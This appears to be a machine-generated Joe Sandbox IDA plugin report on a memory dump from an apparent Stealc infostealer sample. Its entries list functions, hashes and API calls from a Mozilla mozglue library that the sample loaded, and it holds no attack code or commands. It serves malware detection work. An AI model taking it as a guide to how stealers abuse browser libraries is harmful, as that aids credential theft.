Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 7ece0c06cf831317561b0849f7ccc1420956aee0805dc11611b5a905e101a191
Instruction ID: 2eb5ba0c2bd6720edbc2a696feff086480265d6859a9783d19036bc02c30ff41
Opcode Fuzzy Hash: 7ece0c06cf831317561b0849f7ccc1420956aee0805dc11611b5a905e101a191
Instruction Fuzzy Hash: 5A5189B5A007068FEB14CFA8D8907AEB7F5AF49308F164939C616D7701E731BA18CB61

Function 6C1127E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C112620,?,?,?,6C1060AA,6C105FCB,6C1079A3), ref: 6C11284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C112620,?,?,?,6C1060AA,6C105FCB,6C1079A3), ref: 6C11289A
free.MOZGLUE(?,?,?,6C112620,?,?,?,6C1060AA,6C105FCB,6C1079A3), ref: 6C1128F1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C112620,?,?,?,6C1060AA,6C105FCB,6C1079A3), ref: 6C112910
free.MOZGLUE(00000001,?,?,6C112620,?,?,?,6C1060AA,6C105FCB,6C1079A3), ref: 6C11293C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C112620,?,?,?,6C1060AA,6C105FCB,6C1079A3), ref: 6C11294E

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 22653b4d0ee8b5bafa755e99393f48f91c49f57706f06dbc06f8b38082739ab9
Instruction ID: 65daedd40676db2c7822c69fc41932b43e6050b6dc27bfb13962203bbc73f567
Opcode Fuzzy Hash: 22653b4d0ee8b5bafa755e99393f48f91c49f57706f06dbc06f8b38082739ab9
Instruction Fuzzy Hash: AD41E2B1A0821A8FEB24CF6CD89476A73F6EF46308F150939D656EBB40E735E904CB51

Function 6C0CCFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0CCFF6
LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0CD026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C0CD06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C0CD139

Strings

MOZ_CRASH(), xrefs: 6C0CD187

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
Opcode ID: 507f616ee52b3571d4c2f0916cf83c18b4e68ee7983f53c68e7cd858cd124c44
Instruction ID: 0b6e6eb86e84ba5ee2c732ceabe8ec6aacb5ffde2b875b96ce8f52608ee303b8
Opcode Fuzzy Hash: 507f616ee52b3571d4c2f0916cf83c18b4e68ee7983f53c68e7cd858cd124c44
Instruction Fuzzy Hash: 5E41CC72B813125FDB04DEBC8C9436EB6E0EF49728F258139EA18E7784D6B199019BC1

Function 6C0C4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0C4E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C0C4E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0C4EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C0C4F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C0C4F1E

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: eb3c561887139a71a02f88ba20ef7e94c5b26ac635cbaca83aa08711eb4d7bf2
Instruction ID: cc2707215c32630fd56128dff6866ee9ca7a317a2422a171b325baea6a1eddf0
Opcode Fuzzy Hash: eb3c561887139a71a02f88ba20ef7e94c5b26ac635cbaca83aa08711eb4d7bf2
Instruction Fuzzy Hash: B141D171608705AFC701CFA8C480A6FBBE4BF89344F118A1DF46587741D770E955CB92

Function 6C0DC150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0DC1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0DC1DC

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: c9db55a0a2a29a11504ce0ee4cd67baa5c3517b5f7b55f60d035eec4c8a36360
Instruction ID: a65c3656b51646b4c55c021f3cd340b9712cc40e625d2295c789029bdfa52213
Opcode Fuzzy Hash: c9db55a0a2a29a11504ce0ee4cd67baa5c3517b5f7b55f60d035eec4c8a36360
Instruction Fuzzy Hash: D841C4B5D08350CFD710DF64C48079AB7E4BF8A708F41895DE9999B712E730E548CB92

Function 6C12A820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C14F770), ref: 6C12A858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C12A87B

Part of subcall function 6C12A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C12A88F,00000000), ref: 6C12A9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C12A8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C12A90C
LeaveCriticalSection.KERNEL32(6C14F770), ref: 6C12A97E

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: af86ad7d3221e1fd1f2c6b92ff47bdf3b39173c8809dc9688071fcef7bfb9e14
Instruction ID: dc7fa0bca5d2313fff7bdeff810d07ccf424159bfd7021e9b30ab2f27fb1a9b8
Opcode Fuzzy Hash: af86ad7d3221e1fd1f2c6b92ff47bdf3b39173c8809dc9688071fcef7bfb9e14
Instruction Fuzzy Hash: 204191B4E002448FDF00DFA4D845BDEB771FF04328F108629E82AAB791D7359985CB91

Function 6C0D1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C0D152B,?,?,?,?,6C0D1248,?), ref: 6C0D159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0D152B,?,?,?,?,6C0D1248,?), ref: 6C0D15BC
moz_xmalloc.MOZGLUE(-00000001,?,6C0D152B,?,?,?,?,6C0D1248,?), ref: 6C0D15E7
free.MOZGLUE(?,?,?,?,?,?,6C0D152B,?,?,?,?,6C0D1248,?), ref: 6C0D1606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C0D152B,?,?,?,?,6C0D1248,?), ref: 6C0D1637

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: f8cf5b8c566b7c37e761920f50ec8b1545bc12b415bd5897a03ce053b71d88c0
Instruction ID: de65a383136835cb8fbd8f85e2107782d035fc3e1550960875865f85337a4668
Opcode Fuzzy Hash: f8cf5b8c566b7c37e761920f50ec8b1545bc12b415bd5897a03ce053b71d88c0
Instruction Fuzzy Hash: 7F31F672A003149BC7188E78D85066E73E9AF8537472A0B6DE823DBBD4EF30F9048791

Function 6C12AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C13E330,?,6C0EC059), ref: 6C12AD9D

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C13E330,?,6C0EC059), ref: 6C12ADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C13E330,?,6C0EC059), ref: 6C12AE01
GetLastError.KERNEL32(?,00000000,?,?,6C13E330,?,6C0EC059), ref: 6C12AE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C13E330,?,6C0EC059), ref: 6C12AE3D

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: eecc702b3cc8e1c0312fc8655cb740667771430cce3f8d2ad22defcf1c6362ea
Instruction ID: 0a18b940a9649285c1b86f1f22646802a0b0a04d911460d436283a868bdf2e7c
Opcode Fuzzy Hash: eecc702b3cc8e1c0312fc8655cb740667771430cce3f8d2ad22defcf1c6362ea
Instruction Fuzzy Hash: 6C3134B5A003159FDB10DF758C44BABB7F8EF49614F158829E85AE7700E738E845CBA0

Function 6C125EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C13DCA0,?,?,?,6C0FE8B5,00000000), ref: 6C125F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C0FE8B5,00000000), ref: 6C125F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C0FE8B5,00000000), ref: 6C125F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C0FE8B5,00000000), ref: 6C125F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C0FE8B5,00000000), ref: 6C125FD6

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 71fece9fb5a6dc502a57fd34636fe65a9b1871ac60e78e3dcf3e4f1732c25a13
Instruction ID: b45412c46b93d2624b132f5d9cceaf8a66e050fd388ecdbd8ba96a79c2d85253
Opcode Fuzzy Hash: 71fece9fb5a6dc502a57fd34636fe65a9b1871ac60e78e3dcf3e4f1732c25a13
Instruction Fuzzy Hash: C63100383006008FD724DF29C4D8E2AB7F5FF99319BA58598E55687B99C735EC41CB80

Function 6C0CB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C0CB532
moz_xmalloc.MOZGLUE(?), ref: 6C0CB55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0CB56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C0CB57E
free.MOZGLUE(00000000), ref: 6C0CB58F

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 3d03c2b5c0573585cd2f587211e79ff3d062c6e95a56530215af75b325cf92ba
Instruction ID: 8c13e6de1baadce81e6a20423b5ee20e766e83b047aaa9e916de12ba561ffa72
Opcode Fuzzy Hash: 3d03c2b5c0573585cd2f587211e79ff3d062c6e95a56530215af75b325cf92ba
Instruction Fuzzy Hash: 0F21F371B002059BDB009F68CC40BAEBBF9FF86308F684129E818DB341E736D951CBA1

Function 6C0CB7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C0CB7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C0CB808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C0CB82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0CB840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0CB849

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: c406178a8a29a66a2db629f39409ae91a26379409be722cdc5032f8c20782f6c
Instruction ID: 283ea08ec94a6fd114355ab34710f74ff90b004ea467087572c6b63a5af2d260
Opcode Fuzzy Hash: c406178a8a29a66a2db629f39409ae91a26379409be722cdc5032f8c20782f6c
Instruction Fuzzy Hash: 89212CB4E002199FDF04DFA9D8856BEBBF4EF49318F148169EC15A7341E731A948CBA1

Function 6C126E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C126E78

Part of subcall function 6C126A10: InitializeCriticalSection.KERNEL32(6C14F618), ref: 6C126A68
Part of subcall function 6C126A10: GetCurrentProcess.KERNEL32 ref: 6C126A7D
Part of subcall function 6C126A10: GetCurrentProcess.KERNEL32 ref: 6C126AA1
Part of subcall function 6C126A10: EnterCriticalSection.KERNEL32(6C14F618), ref: 6C126AAE
Part of subcall function 6C126A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C126AE1
Part of subcall function 6C126A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C126B15
Part of subcall function 6C126A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C126B65
Part of subcall function 6C126A10: LeaveCriticalSection.KERNEL32(6C14F618,?,?), ref: 6C126B83

MozFormatCodeAddress.MOZGLUE ref: 6C126EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C126EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C126EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C126EFF

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: 4327cdb9f14cc8d79c0317de9ea09925edcc673a31f171661ad58b6fd6a96776
Instruction ID: 26c63353f5b9a5a422252dba9081045e6010e7a7ef4fc75a5d3b1357a451bd5c
Opcode Fuzzy Hash: 4327cdb9f14cc8d79c0317de9ea09925edcc673a31f171661ad58b6fd6a96776
Instruction Fuzzy Hash: B8219271A0421D9FDF10DF69D88569E77F5EF84308F048079E80D97241EB749A998F92

Function 6C1276C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C1276F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C127705

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C127717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C12778F,00000000,00000000,00000000,00000000), ref: 6C127731
free.MOZGLUE(00000000), ref: 6C127760

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 2538299546-0
Opcode ID: 230a960c53dfee5047d3b606a40323c864e864c888a0193dbd5b601dfb59271c
Instruction ID: 0b37af982e242ed40c2fa62edf6a956b1c602722599860256a072f9868352fa6
Opcode Fuzzy Hash: 230a960c53dfee5047d3b606a40323c864e864c888a0193dbd5b601dfb59271c
Instruction Fuzzy Hash: 9111B2B59013256BE710AF7ADC44BABBEF8EF55354F04452AF888A7300E774984087E2

Function 6C100D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C0C3DEF), ref: 6C100D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C0C3DEF), ref: 6C100D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C0C3DEF), ref: 6C100DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C100D97, 6C100DBE
<jemalloc>, xrefs: 6C100D92, 6C100DB9

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 22df84b9619c3ead37cd7aea095de694c942b352919409a5c77e442d0eb8047a
Instruction ID: 137992ce22fed590718d5c82fd4a1ddb3fad33ad64c682075a0e6c8de92dc05d
Opcode Fuzzy Hash: 22df84b9619c3ead37cd7aea095de694c942b352919409a5c77e442d0eb8047a
Instruction Fuzzy Hash: 82F0893138179563E63429665C0AB6A275D67C2B65F34C036F608EA9C0DE64E410D7B5

Function 6C125850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 6C12586C
CloseHandle.KERNEL32 ref: 6C125878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C125898
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C1258C9
free.MOZGLUE(00000000), ref: 6C1258D3

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$CloseHandleObjectSingleWait
String ID:
API String ID: 1910681409-0
Opcode ID: 57cec4bc54bed43e7e9de870e4f7dc06b9692a9b5221c70911fc50f830a80d43
Instruction ID: f7bcb1135a6646d0de6d6d619b6f677c54fb6e859c9e7b1b51669c15b4509cc5
Opcode Fuzzy Hash: 57cec4bc54bed43e7e9de870e4f7dc06b9692a9b5221c70911fc50f830a80d43
Instruction Fuzzy Hash: 98014B79704201DBDB00FF2A9858A067BB8EB9332D724C176E53ADA310E7759824AF91

Function 6C117620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C1175C4,?), ref: 6C11762B

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C1174D7,6C1215FC,?,?,?), ref: 6C117644
GetCurrentThreadId.KERNEL32 ref: 6C11765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C1174D7,6C1215FC,?,?,?), ref: 6C117663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C1174D7,6C1215FC,?,?,?), ref: 6C117677

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: 8ab6061def72ab26304dfcebcd192467f63c03d9d07d85aadcbb743571b866ce
Instruction ID: c7285869d74766df6de369c5310e4d225705e0dcf4b582c570c2a4c6377c1485
Opcode Fuzzy Hash: 8ab6061def72ab26304dfcebcd192467f63c03d9d07d85aadcbb743571b866ce
Instruction Fuzzy Hash: 02F0AF71E10B45ABD7009F22C888A7AB778FFEA25DF128356F90453601E7B0A5D08BD0

Function 6C121700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C121800

Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA

Part of subcall function 6C0C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C103EBD,6C103EBD,00000000), ref: 6C0C42A9

Strings

Details, xrefs: 6C121925
{marker.name} - {marker.data.name}, xrefs: 6C1218C7
